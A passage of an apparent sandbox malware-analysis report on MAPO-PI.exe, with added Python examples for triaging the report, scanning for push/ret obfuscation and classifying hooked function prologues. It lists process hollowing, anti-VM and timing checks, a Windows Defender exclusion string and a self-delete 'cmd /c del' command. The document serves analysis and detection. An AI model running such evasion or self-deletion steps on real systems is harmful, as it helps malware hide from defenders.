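Source: C:\Windows\SysWOW64\cmmon32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\MAPO-PI.exe'
Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018D99D0 NtCreateProcessEx,
Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018D97A0 NtUnmapViewOfSection,LdrInitializeThunk,
Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018D98A0 NtWriteVirtualMemory,
Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018DAD30 NtSetContextThread,
Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018D9A20 NtResumeThread,LdrInitializeThunk,
Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018D9950 NtQueueApcThread,
Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04CA9560 NtWriteFile,
"""


def parse_report(text):
    """Group resolved native calls per (image, pid) and collect (parent, cmdline) creations."""
    calls = defaultdict(set)
    procs = []
    for raw in text.splitlines():
        line = raw.strip()
        m = CODE_RE.match(line)
        if m:
            apis = {a for a in m.group("apis").split(",") if a}   # drop the trailing empty field
            calls[(m.group("image"), int(m.group("pid")))] |= apis
            continue
        m = PROC_RE.match(line)
        if m:
            procs.append((m.group("parent"), m.group("cmdline")))
    return dict(calls), procs


def triage(text):
    """Return (kind, subject, evidence) findings in a deterministic order."""
    calls, procs = parse_report(text)
    findings = []
    for (image, pid), apis in sorted(calls.items()):
        if HOLLOWING_CORE <= apis:
            used = sorted(apis & (HOLLOWING_CORE | HOLLOWING_SUPPORT))
            findings.append(("process_hollowing", f"pid {pid} {image}", used))
        if APC_INJECTION <= apis:
            findings.append(("apc_injection", f"pid {pid} {image}", sorted(APC_INJECTION)))
    for parent, cmdline in procs:
        if DEFENDER_EXCLUSION_RE.search(cmdline):
            findings.append(("defender_exclusion", parent, [cmdline]))
        if parent.lower().endswith("\\explorer.exe"):      # a shell-spawned child is worth a look
            findings.append(("explorer_spawned_child", parent, [cmdline]))
        if SELF_DELETE_RE.search(cmdline):
            findings.append(("self_delete", parent, [cmdline]))
    return findings


if __name__ == "__main__":
    for kind, subject, evidence in triage(SAMPLE_REPORT):
        print(f"{kind:24} {subject}")
        for item in evidence:
            print(f"{'':24}   {item}")
```

Run against the whole exported report rather than the excerpt, the per-pid grouping is what separates the injected cmmon32.exe (pid 16 here, which only shows file I/O in the sample) from the process that did the injecting (pid 3).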

          Data Obfuscation:

.NET source code contains potential unpacker
Source: MAPO-PI.exe, Platformer_AI/GameDisplay.cs | .Net Code: TypeNameBuilder System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 0.2.MAPO-PI.exe.70000.0.unpack, Platformer_AI/GameDisplay.cs | .Net Code: TypeNameBuilder System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 0.0.MAPO-PI.exe.70000.0.unpack, Platformer_AI/GameDisplay.cs | .Net Code: TypeNameBuilder System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 3.0.MAPO-PI.exe.eb0000.3.unpack, Platformer_AI/GameDisplay.cs | .Net Code: TypeNameBuilder System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 3.2.MAPO-PI.exe.eb0000.1.unpack, Platformer_AI/GameDisplay.cs | .Net Code: TypeNameBuilder System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 3.0.MAPO-PI.exe.eb0000.0.unpack, Platformer_AI/GameDisplay.cs | .Net Code: TypeNameBuilder System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 3.0.MAPO-PI.exe.eb0000.9.unpack, Platformer_AI/GameDisplay.cs | .Net Code: TypeNameBuilder System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 3.0.MAPO-PI.exe.eb0000.2.unpack, Platformer_AI/GameDisplay.cs | .Net Code: TypeNameBuilder System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 3.0.MAPO-PI.exe.eb0000.1.unpack, Platformer_AI/GameDisplay.cs | .Net Code: TypeNameBuilder System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 3.0.MAPO-PI.exe.eb0000.7.unpack, Platformer_AI/GameDisplay.cs | .Net Code: TypeNameBuilder System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 3.0.MAPO-PI.exe.eb0000.5.unpack, Platformer_AI/GameDisplay.cs | .Net Code: TypeNameBuilder System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_004170AC push eax; retf
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_00417A47 push edx; ret
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_0040ED75 push 00000051h; retf
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_0041CEF2 push eax; ret
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_0041CEFB push eax; ret
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_0041CEA5 push eax; ret
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_0041CF5C push eax; ret
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018ED0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04CBD0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_03047A47 push edx; ret
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_030470AC push eax; retf
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_0304CF5C push eax; ret
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_0304CEA5 push eax; ret
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_0304CEF2 push eax; ret
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_0304CEFB push eax; ret
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_0303ED75 push 00000051h; retf
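The `push eax; retf`, `push edx; ret`, `push 00000051h; retf` and `push ecx; ret` pairs listed above are the sandbox's evidence for the "call, push, ret" obfuscation signature: a push followed directly by a ret transfers control to whatever was pushed, so the branch does not show up as a jmp or call to a static disassembler. The following scanner is an added example, not part of the report or of Joe Sandbox. It decodes only the push and ret encodings needed for those shapes (32-bit operand size, no prefixes) and runs over a constructed byte string, not over the sample's own code.

```python
# Minimal x86 pattern scanner for push-then-ret pairs. Assumption: 32-bit code
# without prefixes; only push r32 / push imm8 / push imm32 and ret / retf /
# ret imm16 / retf imm16 are decoded. This is a pattern matcher, not a disassembler.
REG32 = ["eax", "ecx", "edx", "ebx", "esp", "ebp", "esi", "edi"]
RET_MNEMONIC = {0xC3: "ret", 0xCB: "retf", 0xC2: "ret", 0xCA: "retf"}


def decode_push(buf, i):
    """(length, text) for a push instruction starting at buf[i], else None."""
    op = buf[i]
    if 0x50 <= op <= 0x57:                          # push r32
        return 1, f"push {REG32[op - 0x50]}"
    if op == 0x6A and i + 1 < len(buf):             # push imm8, sign-extended to 32 bits
        imm = buf[i + 1] - 0x100 if buf[i + 1] >= 0x80 else buf[i + 1]
        return 2, f"push {imm & 0xFFFFFFFF:08X}h"
    if op == 0x68 and i + 4 < len(buf):             # push imm32
        imm = int.from_bytes(buf[i + 1:i + 5], "little")
        return 5, f"push {imm:08X}h"
    return None


def decode_ret(buf, i):
    """(length, text) for a ret instruction starting at buf[i], else None."""
    op = buf[i]
    if op in (0xC3, 0xCB):                          # ret / retf
        return 1, RET_MNEMONIC[op]
    if op in (0xC2, 0xCA) and i + 2 < len(buf):     # ret imm16 / retf imm16
        imm = int.from_bytes(buf[i + 1:i + 3], "little")
        return 3, f"{RET_MNEMONIC[op]} {imm:04X}h"
    return None


def find_push_ret(buf, base=0):
    """Linear sweep for a push immediately followed by a ret.

    push imm; ret is an absolute jump to imm, push reg; ret a jump to reg, so each
    hit is a disguised branch. Returns [(address, "push ...; ret ...")]. After a hit
    the scan resumes after the pair so an immediate byte is not re-decoded as an
    opcode; otherwise it advances one byte, so hits inside data or inside longer
    instructions are possible and must be confirmed in a real disassembler.
    """
    hits = []
    i = 0
    while i < len(buf):
        push = decode_push(buf, i)
        if push and i + push[0] < len(buf):
            ret = decode_ret(buf, i + push[0])
            if ret:
                hits.append((base + i, f"{push[1]}; {ret[1]}"))
                i += push[0] + ret[0]
                continue
        i += 1
    return hits


# Constructed sample bytes (not taken from the sample): a normal prologue whose
# push is not followed by ret, then the four shapes the report lists, then a
# push imm32; ret absolute jump and a push; ret imm16.
SAMPLE_CODE = bytes([
    0x55, 0x8B, 0xEC,                        # push ebp; mov ebp, esp  (benign)
    0x50, 0xC3,                              # push eax; ret
    0x90,                                    # nop
    0x6A, 0x51, 0xCB,                        # push 51h; retf
    0x52, 0xC3,                              # push edx; ret
    0x68, 0x78, 0x56, 0x34, 0x12, 0xC3,      # push 12345678h; ret  (jump to 0x12345678)
    0x51, 0xC2, 0x04, 0x00,                  # push ecx; ret 4
])

if __name__ == "__main__":
    for addr, text in find_push_ret(SAMPLE_CODE, base=0x401000):
        print(f"{addr:08X}  {text}")
```

A `push imm32; ret` whose immediate lies inside the image's own sections is the case worth following up first: it is a plain absolute jump that a linear disassembler shows as dead code after the ret.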

          Hooking and other Techniques for Hiding and Protection:

Modifies the prolog of user mode functions (user mode inline hooks)
Source: explorer.exe | User mode code has changed: module: user32.dll, function: PeekMessageA, new code: 0x48 0x8B 0xB8 0x8E 0xEE 0xEA
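The PeekMessageA finding above is what an in-memory prologue comparison produces: the first bytes of the exported function in explorer.exe no longer match the clean image. The following Python is an added example, not part of the report or of Joe Sandbox. It assumes the caller has already obtained the expected and observed prologue bytes (for instance from the DLL on disk with relocations applied and from a process memory dump); FUNC_VA, CLEAN and HOOK_TARGET are made-up values, and only the six observed bytes are taken from the report. It classifies the difference by the redirection stubs hooking libraries commonly emit and reports anything else, such as the bytes seen here, as an unrecognised modification.

```python
import struct


def classify_prologue(func_va, expected, observed):
    """Compare a function's first bytes as mapped in the inspected process (observed)
    with the clean copy (expected). Returns (verdict, detail); for the common hook
    stubs the detail names where execution is redirected to."""
    n = min(len(expected), len(observed))
    if observed[:n] == expected[:n]:
        return "clean", None
    b = observed
    if b[0] == 0xE9 and len(b) >= 5:                                   # jmp rel32
        rel = struct.unpack_from("<i", b, 1)[0]
        return "inline_hook", f"jmp rel32 -> {func_va + 5 + rel:#x}"
    if b[:2] == b"\xff\x25" and len(b) >= 6:                           # jmp [rip+disp32] (x64)
        disp = struct.unpack_from("<i", b, 2)[0]
        return "inline_hook", f"jmp qword ptr [{func_va + 6 + disp:#x}]"
    if b[:2] == b"\x48\xb8" and len(b) >= 12 and b[10:12] == b"\xff\xe0":   # mov rax, imm64; jmp rax
        target = struct.unpack_from("<Q", b, 2)[0]
        return "inline_hook", f"mov rax, imm64; jmp rax -> {target:#x}"
    if b[0] == 0x68 and len(b) >= 6 and b[5] == 0xC3:                  # push imm32; ret (x86)
        target = struct.unpack_from("<I", b, 1)[0]
        return "inline_hook", f"push imm32; ret -> {target:#x}"
    return "modified", "prologue differs: " + " ".join(f"{x:02X}" for x in b[:n])


# Constructed values (hypothetical): a pretend address for user32!PeekMessageA in
# explorer.exe, a typical x64 prologue (mov [rsp+8],rbx; push rdi; sub rsp,20h), and a
# jmp rel32 hook pointing at HOOK_TARGET. PAGE_OBSERVED is the byte sequence the report shows.
FUNC_VA = 0x00007FFB1234A000
CLEAN = bytes.fromhex("48895C2408574883EC20")
HOOK_TARGET = 0x00007FFB20001000
HOOKED = b"\xE9" + struct.pack("<i", HOOK_TARGET - (FUNC_VA + 5)) + CLEAN[5:]
PAGE_OBSERVED = bytes.fromhex("488BB88EEEEA")

if __name__ == "__main__":
    for label, observed in (("clean", CLEAN), ("hooked", HOOKED), ("report", PAGE_OBSERVED)):
        print(label, classify_prologue(FUNC_VA, CLEAN, observed))
```

The comparison must use the relocated on-disk bytes, not the raw file: a function whose first instruction carries an absolute address legitimately differs from the file once the loader has applied relocations, and that difference is not a hook.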
Self deletion via cmd delete
Source: C:\Windows\SysWOW64\cmmon32.exe | Process created: /c del 'C:\Users\user\Desktop\MAPO-PI.exe'
Source: C:\Windows\SysWOW64\cmmon32.exe | Process created: /c del 'C:\Users\user\Desktop\MAPO-PI.exe'
Source: C:\Users\user\Desktop\MAPO-PI.exe | Registry key monitored for changes: HKEY_CURRENT_USER_Classes
Source: C:\Users\user\Desktop\MAPO-PI.exe | Process information set: NOOPENFILEERRORBOX (32 identical entries)
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\cmmon32.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          Yara detected AntiVM3
          Source: Yara match File source: 0.2.MAPO-PI.exe.25fd0c0.1.raw.unpack, type: UNPACKEDPE
          Source: Yara match File source: 00000000.00000002.238302616.00000000025B1000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match File source: Process Memory Space: MAPO-PI.exe PID: 3868, type: MEMORYSTR
          Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
          Source: MAPO-PI.exe, 00000000.00000002.238302616.00000000025B1000.00000004.00000001.sdmp Binary or memory string: SBIEDLL.DLL
          Source: MAPO-PI.exe, 00000000.00000002.238302616.00000000025B1000.00000004.00000001.sdmp Binary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
          Tries to detect virtualization through RDTSC time measurements
          Source: C:\Users\user\Desktop\MAPO-PI.exe RDTSC instruction interceptor: First address: 00000000004098E4 second address: 00000000004098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\MAPO-PI.exe RDTSC instruction interceptor: First address: 0000000000409B4E second address: 0000000000409B54 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\cmmon32.exe RDTSC instruction interceptor: First address: 00000000030398E4 second address: 00000000030398EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\cmmon32.exe RDTSC instruction interceptor: First address: 0000000003039B4E second address: 0000000003039B54 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\MAPO-PI.exe TID: 1752 Thread sleep time: -43348s >= -30000s
          Source: C:\Users\user\Desktop\MAPO-PI.exe TID: 2952 Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1552 Thread sleep time: -7378697629483816s >= -30000s
          Source: C:\Windows\explorer.exe TID: 4856 Thread sleep time: -54000s >= -30000s
          Source: C:\Windows\SysWOW64\cmmon32.exe TID: 6932 Thread sleep time: -65000s >= -30000s
          Source: C:\Windows\explorer.exe Last function: Thread delayed
          Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_00409A80 rdtsc
          Source: C:\Users\user\Desktop\MAPO-PI.exe Thread delayed: delay time: 922337203685477
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5905
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2572
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
          Source: C:\Users\user\Desktop\MAPO-PI.exe Thread delayed: delay time: 43348
          Source: MAPO-PI.exe, 00000000.00000002.238302616.00000000025B1000.00000004.00000001.sdmp Binary or memory string: VMware SVGA IIBAdd-MpPreference -ExclusionPath "
          Source: MAPO-PI.exe, 00000000.00000002.238302616.00000000025B1000.00000004.00000001.sdmp Binary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: explorer.exe, 00000004.00000000.278762456.000000000891C000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: MAPO-PI.exe, 00000000.00000002.238302616.00000000025B1000.00000004.00000001.sdmp Binary or memory string: vmware
          Source: explorer.exe, 00000004.00000000.273464193.0000000003767000.00000004.00000001.sdmp Binary or memory string: VMware SATA CD00
          Source: explorer.exe, 00000004.00000000.272236107.00000000011B3000.00000004.00000020.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000tft\0
          Source: explorer.exe, 00000004.00000000.266810191.00000000089B5000.00000004.00000001.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000%
          Source: explorer.exe, 00000004.00000000.258291932.00000000053C4000.00000004.00000001.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}>'R\"
          Source: explorer.exe, 00000004.00000000.266810191.00000000089B5000.00000004.00000001.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&0000002
          Source: MAPO-PI.exe, 00000000.00000002.238302616.00000000025B1000.00000004.00000001.sdmp Binary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
          Source: C:\Users\user\Desktop\MAPO-PI.exe Process token adjusted: Debug
          Source: C:\Windows\SysWOW64\cmmon32.exe Process token adjusted: Debug
          Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018BC182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018CA185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018C2990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018C61A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_019151BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_019549A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018B99BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018B99BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_019169A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_0189B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_019241E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_01899100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018B4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018B4120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018C513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018BB944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_0189C962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_0189B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_01899080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_01913884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018D90AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018C20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018CF0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018CF0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_0192B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_0192B8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018958EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018940E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018BB8E4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_01964015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_01917016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018AB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018C002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018BA830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018B0050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_01961074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_01952073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018A1B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_0194D380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018C2397 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018CB390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_0195138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018C4BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_01965BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_019153CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018BDBE9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018C03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_019423E3 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_019423E3 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018BA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_0195131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_0189DB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01968B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_0189F358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_0189DB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018C3B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018C3B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018CD294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018CD294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018952A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018952A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018952A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018952A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018952A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018AAAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018AAAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018CFAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018C2ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018C2AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01954AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01954AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01954AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01954AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01954AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01954AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01954AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01954AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01954AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01954AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01954AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01954AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01954AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01954AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018A8A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_0195AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_0195AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018B3A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01895210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01895210 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01895210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01895210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_0189AA16 mov eax, dword ptr fs:[00000030h]
